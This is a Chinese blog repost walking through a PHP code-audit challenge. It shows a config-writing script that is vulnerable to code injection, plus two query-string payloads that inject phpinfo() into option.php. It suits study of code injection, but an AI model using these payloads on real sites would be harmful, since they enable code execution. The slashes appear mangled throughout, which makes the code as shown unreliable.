这篇文章主要介绍了 PHP代码审计的示例分析,具有一定借鉴价值,感兴趣的朋友可以参考下,希望大家阅读完这篇文章之后大有收获,下面让小编带着大家一起了解一下。
Challenge
index.php
<?php
$str = addslashes($_GET['option']);
$file = file_get_contents('xxxxx/option.php');
$file = preg_replace('|/$option=/'.*/';|', "/$option='$str';", $file);
file_put_contents('xxxxx/option.php', $file);
xxxxx/option.php
$option='test';
Solution
流程如下:
-
对传入的option参数进行addslashes,比如有单引号
',会变成/' -
通过正则匹配xxxxx/option.php中的
$option='xxx';,将xxx的内容替换为经第一步处理的值 -
替换完成,将其写入xxxxx/option.php。
场景: 用于写入配置文件等。
法一
先访问:
?option=aaa';%0aphpinfo();//
经过addslashes后,$str值为 aaa/';%0aphpinfo();//
进行正则匹配并写入文件,xxxxx/option.php的内容变为:
<?php $option='aaa/'; phpinfo();//'; ?>
再访问:
?option=xxx
正则匹配时,会将两个单引号里的内容即 aaa/ ,替换为 xxx,此时xxxxx/option.php的内容变为
<?php $option='xxx'; phpinfo();//'; ?>
最后访问:/xxxxx/option.php
法二
访问:
?option=aaa/';phpinfo();//
经过addslashes后,$str为 aaa///';phpinfo();//
经过preg_replace正则匹配后,对/做了转义处理,xxxxx/option.php的内容变为:
<?php $option='aaa//';phpinfo();//'; ?>
最后访问:/xxxxx/option.php
感谢你能够认真阅读完这篇文章,希望小编分享的“ PHP代码审计的示例分析”这篇文章对大家有帮助,同时也希望大家多多支持亿速云,关注亿速云行业资讯频道,更多相关知识等着你来学习!
原创文章,作者:carmelaweatherly,如若转载,请注明出处:https://blog.ytso.com/227539.html